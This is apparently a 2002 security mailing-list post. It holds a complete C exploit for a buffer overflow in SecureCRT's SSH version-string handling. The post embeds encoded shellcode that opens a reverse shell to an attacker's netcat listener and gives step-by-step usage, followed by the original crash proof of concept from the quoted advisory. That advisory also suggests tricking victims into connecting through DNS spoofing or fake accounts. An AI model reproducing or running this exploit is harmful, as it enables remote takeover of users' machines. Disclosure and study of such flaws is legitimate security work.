The following code is a remote shell exploiting the bug discovered by
Kyuzo... it use netcat
bye
// The bug was discovered by Kyuzo
// The schell code exploit was coded by Andrea Lisci
// The program working in the following way
//
// run the exploit
//./shellcode <netcat_machine> <netcat_port>
// run the netcat
// nc -l -p <netcat_port>
// connect from secureCRT to the port 9988 using ssh version 1
//
// the remote shell will be opened at netcat computer
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define PORT 9988
int main(int argc, char **argv) {
int s, n, i, sz = sizeof(struct sockaddr_in);
struct sockaddr_in local, whatever;
char payload[2510], *pshell;
unsigned char preshell[]="\xb8\x00\x03\xff\xe0";
unsigned short int a_port;
unsigned long a_host;
struct hostent *ht;
struct sockaddr_in sin;
unsigned char shell[] =
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\x16\x53\x84"
"\x6a\x73\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d\x95\x94"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc3\x98\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\xc4\x2b\x02\x75\x66\xc7\x47\x4c\x01\x81\x50\x8d\x47\x20"
"\x50\x83\xee\x11\x05\x11\x11\x11\x01\x2d\x7a\x12\x11\x01\xff\xe0";
a_port=htons(atoi(argv[2]));
a_port ^= 0x9595;
//ht=gethostbyname(argv[1]);
//a_host= (unsigned long) *(ht->h_addr);
a_host=inet_addr(argv[1]);
a_host ^= 0x95959595;
shell[385]= ((a_port) & 0xff);
shell[386]= ((a_port >> 8 ) & 0xff);
shell[390]= ((a_host) & 0xff);
shell[391]= ((a_host >> 8) & 0xff);
shell[392]= ((a_host >>16) & 0xff);
shell[393]= ((a_host >>24) & 0xff);
memset(payload,0x90,sizeof(payload));
strcpy(payload, "SSH-1.1-");
for (i = 8; i < 267; i++)
payload[i] = 'A';
payload[i+1]=0x00;
payload[i+2]=0xbb;
payload[i+3]=0x12;
payload[i+4]=0x00;
payload[i+5] = '\n';
payload[i+6]= '\0';
pshell=&payload;
pshell+=100;
memcpy(pshell,preshell,sizeof(preshell));
pshell=&payload;
pshell+=300;
memcpy(pshell,shell,sizeof(shell));
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
return 1;
}
local.sin_family = AF_INET;
local.sin_port = htons(PORT);
local.sin_addr.s_addr = INADDR_ANY;
memset(&(local.sin_zero), 0, 8);
if (bind(s, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) {
perror("bind");
return 1;
}
if (listen(s, 2) == -1) {
perror("listen");
return 1;
}
printf("waiting for connection...\n");
if ((n = accept(s, (struct sockaddr *)&whatever, &sz)) == -1) {
perror("accept");
return 1;
}
printf("client connected\n");
if (send(n, payload, sizeof(payload) - 1, 0) == -1) {
perror("send");
return 1;
}
printf("sent string: [%s]\n", payload);
close(n);
close(s);
return 0;
}
----- Original Message -----
From: "Kyuzo" <ogl@SirDrinkalot.rm-f.net>
To: <bugtraq@securityfocus.com>
Sent: Tuesday, July 23, 2002 5:09 AM
Subject: Arbitrary Code Execution Vulnerability in VanDyke SecureCRT 3.4 &
4.0 beta
> SecureCRT (http://www.vandyke.com/products/securecrt/) seems to have a bug
in a
> seemlingly trivial portion of its SSH connection code. When an SSH Client
> connects to a server, the server sends a version string containing minor
and
> major numbers for the protocol, as well as a server-specific identifier
string
> which is specified to be no more than 40 bytes long. Unfortunetly the
SecureCRT
> code which handles errors relating to an unsupported protocol version
contains
> an unchecked buffer overflow when dealing with this identifier string.
>
> The following C code is given to reproduce this bug (yes I know Perl would
have
> been shorter, sorry):
>
> #include <stdio.h>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
>
> #define PORT 9988
>
> int main(int argc, char **argv) {
> int s, n, i, sz = sizeof(struct sockaddr_in);
> struct sockaddr_in local, whatever;
> char payload[510];
>
> strcpy(payload, "SSH-1.1-");
> for (i = 8; i < 508; i++)
> payload[i] = 'A';
> payload[508] = '\n';
> payload[509] = '\0';
>
> if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
> perror("socket");
> return 1;
> }
> local.sin_family = AF_INET;
> local.sin_port = htons(PORT);
> local.sin_addr.s_addr = INADDR_ANY;
> memset(&(local.sin_zero), 0, 8);
> if (bind(s, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1)
{
> perror("bind");
> return 1;
> }
> if (listen(s, 2) == -1) {
> perror("listen");
> return 1;
> }
> printf("waiting for connection...\n");
> if ((n = accept(s, (struct sockaddr *)&whatever, &sz)) == -1) {
> perror("accept");
> return 1;
> }
> printf("client connected\n");
> if (send(n, payload, sizeof(payload) - 1, 0) == -1) {
> perror("send");
> return 1;
> }
> printf("sent string: [%s]\n", payload);
> close(n);
> close(s);
> return 0;
> }
>
> After starting the (fake) server, run the SecureCRT client, attach a
debugger
> and connect. Notice the value of PC is now 0x41414141...coincidence?
>
> There are a number of ways to trick people into connecting to your ssh
server,
> i.e. telling them you've given them an account on your shell, dns spoofing
etc.
>
> Big shout-out to Lagow, Biggie Smalls (up in heaven),
> Gweeds, & the whole Mr. Mittens crew
>
> - Kyuzo
>
